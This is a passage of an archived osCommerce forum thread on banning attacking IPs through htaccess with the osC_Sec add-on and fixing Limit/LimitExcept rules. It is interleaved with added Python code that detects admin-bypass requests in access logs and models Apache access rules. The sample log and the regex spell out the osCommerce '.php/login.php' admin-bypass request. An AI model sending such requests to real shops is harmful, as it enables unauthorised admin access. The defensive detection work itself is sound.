In actual fact, it is also ok to go into your htaccess and delete out the list of banned IP addresses once a week as well if you wish. The chances of your site receiving another attack from the same IP address after the attacker's end has received a 403 ban is minimal, however the point of adding the IP address to the htaccess file as osc_sec does is to reduce the load on your webserver.

From what I have seen, these requests are repeated via the same IP address for about an hour, so if your scripting is merely blocking the requests rather than banning the IP address, then the server will still be under load, well a little more than if the IP address was just banned outright. This is even worse for those that are using a patched version of Oscommerce like 2.3.1. The requests being automated, will still be coming in and trying to load that type of URL, in which the patched version of Oscommerce would (in the instance above) redirect the request to the index.php, but being in the admin directory, would then redirect again to the login.php script. Which is ok if you are receiving 6 or so of these requests a day, however for busier sites they could be receiving 20 or so of these per minute often from the same IP address, which without using htaccess blocking, would lag their webserver something fierce.

So osc_sec takes the effort out of htaccess banning and does it all for you. But again, the list of IPs can be deleted on a regular basis, weekly or whenever.
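To make concrete what the osC_Sec notification above reacts to and what the htaccess ban it writes looks like, here is a small access-log scanner. It is an added illustration, not osC_Sec's own code: it flags requests whose URI carries the `.php/login.php` PATH_INFO pattern (the admin bypass request quoted above), counts them per client address, and emits the `deny from` lines a ban would append to .htaccess. It assumes Apache combined log format; the log lines are constructed, and only the 70.32.97.156 address comes from the thread.

```python
import re
from collections import Counter
from urllib.parse import unquote

# The admin bypass request osC_Sec reported above: a .php script name with
# "/login.php" appended as PATH_INFO, anywhere in the path or query string.
BYPASS_PATTERN = re.compile(r"\.php/login\.php(?:[/?#]|$)", re.I)

# Apache combined format: ip ident user [time] "METHOD URI PROTO" status bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log; only the 70.32.97.156 address comes from the thread.
SAMPLE_LOG = """\
70.32.97.156 - - [23/Apr/2011:04:36:00 +0000] "GET /cart/index.php?cPath=21/admin/file_manager.php/login.php HTTP/1.1" 403 221
70.32.97.156 - - [23/Apr/2011:04:36:02 +0000] "GET /cart/admin/categories.php/login.php HTTP/1.1" 403 221
203.0.113.7 - - [23/Apr/2011:04:37:10 +0000] "GET /cart/index.php?cPath=21 HTTP/1.1" 200 8120
203.0.113.7 - - [23/Apr/2011:04:37:11 +0000] "GET /cart/login.php HTTP/1.1" 200 4310
"""


def is_bypass_attempt(uri):
    """True when the URI (path or query) carries the .php/login.php PATH_INFO pattern.
    The URI is percent-decoded first so encoded variants are matched the same way."""
    return BYPASS_PATTERN.search(unquote(uri)) is not None


def scan_log(log_text):
    """Count bypass attempts per client address across access-log lines."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m and is_bypass_attempt(m.group("uri")):
            hits[m.group("ip")] += 1
    return dict(hits)


def deny_lines(hits, threshold=1):
    """htaccess 'deny from' lines for addresses at or above the ban threshold
    ($oscsec_threshold=1 in the notification above: one attempt is enough)."""
    return [f"deny from {ip}" for ip in sorted(hits) if hits[ip] >= threshold]


if __name__ == "__main__":
    print("\n".join(deny_lines(scan_log(SAMPLE_LOG))))
```

Note that the normal storefront `/cart/login.php` request is not flagged; only a `.php` name followed by a further `/login.php` segment is.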
qwertyjjj Posted April 23, 2011

> Unless the attacker was able to find your admin directory, or able to bypass the htaccess blocking in the way I described, the other option is that there is a piece of appended code in one of your site files that must have been resident there before you installed SiteMon? (assuming that SiteMon is doing its job correctly)
>
> <LimitExcept GET POST>
> Deny from all
> </LimitExcept>
>
> <Limit GET POST>
> order allow,deny
> deny from all
> allow from [your_external_ip_address]
> </Limit>
>
> Just put your external IP address in the allow from. BTW what code were you using prior to this to allow only your IP address?

Can't remember exactly but I think I was just using:

    order allow,deny
    deny from all
    allow from [your_external_ip_address]

It was working correctly though. At the moment the below code works but not the suggestion above:

    <Limit GET POST PUT>
    order deny,allow
    deny from all
    #allow from xx.xx.xx.xx/11
    #allow from xx.xx.xx.xx/12
    allow from xx.xx.xx.xx/12
    </Limit>

I tried the below but it won't let me access. Is there any issue with the 2 directives in the same htaccess? Should I only be using this for the admin folder?

    <LimitExcept GET POST>
    Deny from all
    </LimitExcept>

    <Limit GET POST>
    order allow,deny
    deny from all
    allow from [I put my IP address block here]
    </Limit>

Is this a normal oscommerce file?

    File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/cookie_usage.php (Known filename threat)
Taipo Posted April 23, 2011

That could well be the issue. However if you are using it without the directives then best leave it at that... since that works.
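The htaccess variants traded above can be checked against Apache 2.2's documented Order/Limit/LimitExcept semantics with this small evaluator, added here as an illustration and not part of the thread or of osC_Sec. It shows why `order allow,deny` combined with `deny from all` rejects every client including the listed address, why the `order deny,allow` form admits it, and why a `<Limit>` without a `<LimitExcept>` fence leaves other methods (HEAD, OPTIONS, ...) unrestricted. The 203.0.113.x addresses are constructed placeholders; only `Allow/Deny from all|IP|CIDR` and standard method names are modelled.

```python
import ipaddress
import re

# Apache 2.2 mod_authz_host stores Order per method; methods no Order covers
# default to deny,allow, i.e. admitted unless a Deny matches. Constructed
# configs below mirror the thread; 203.0.113.x are placeholder addresses.
POSTED_ALLOW_DENY = """<LimitExcept GET POST>
Deny from all
</LimitExcept>
<Limit GET POST>
order allow,deny
deny from all
allow from 203.0.113.7
</Limit>"""  # the posted form: blocks its own owner
FENCED_DENY_ALLOW = POSTED_ALLOW_DENY.replace("allow,deny", "deny,allow")
WORKING_NO_FENCE = """<Limit GET POST PUT>
order deny,allow
deny from all
allow from 203.0.113.0/24
</Limit>"""  # works for GET/POST/PUT, but other methods are never checked

def parse_htaccess(text):
    """Rules as (methods, negate, directive, value); methods is None outside any Limit."""
    rules, methods, negate = [], None, False
    for raw in text.splitlines():
        line = raw.split("#")[0].strip()
        opened = re.match(r"<(Limit|LimitExcept)\s+([^>]+)>", line, re.I)
        if opened:
            methods = set(opened.group(2).upper().split())
            negate = opened.group(1).lower() == "limitexcept"
        elif re.match(r"</Limit(Except)?>", line, re.I):
            methods, negate = None, False
        elif line:
            directive, _, value = line.partition(" ")
            rules.append((methods, negate, directive.lower(), value.strip().lower()))
    return rules

def host_matches(pattern, ip):  # 'all' or an IP/CIDR, as Allow/Deny from accept
    return pattern == "all" or ipaddress.ip_address(ip) in ipaddress.ip_network(pattern, strict=False)

def decide(rules, method, ip):
    """True if Apache 2.2 mod_authz_host would admit method/ip under these rules."""
    method = method.upper()
    active = [r for r in rules if r[0] is None or (method in r[0]) != r[1]]
    # the last Order directive covering this method wins; default deny,allow
    order = next((v.replace(" ", "") for _, _, d, v in reversed(active) if d == "order"), "deny,allow")
    allowed = any(host_matches(v.split()[-1], ip) for _, _, d, v in active if d == "allow")
    denied = any(host_matches(v.split()[-1], ip) for _, _, d, v in active if d == "deny")
    if order == "allow,deny":       # an Allow must match and no Deny may match
        return allowed and not denied
    return allowed or not denied    # deny,allow: admitted unless only a Deny matches
```

Run `decide(parse_htaccess(POSTED_ALLOW_DENY), "GET", "203.0.113.7")` to see the owner rejected by the posted form, and `decide(parse_htaccess(WORKING_NO_FENCE), "HEAD", "70.32.97.156")` to see a method outside the `<Limit>` list pass through unchecked.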
This topic is now archived and is closed to further replies.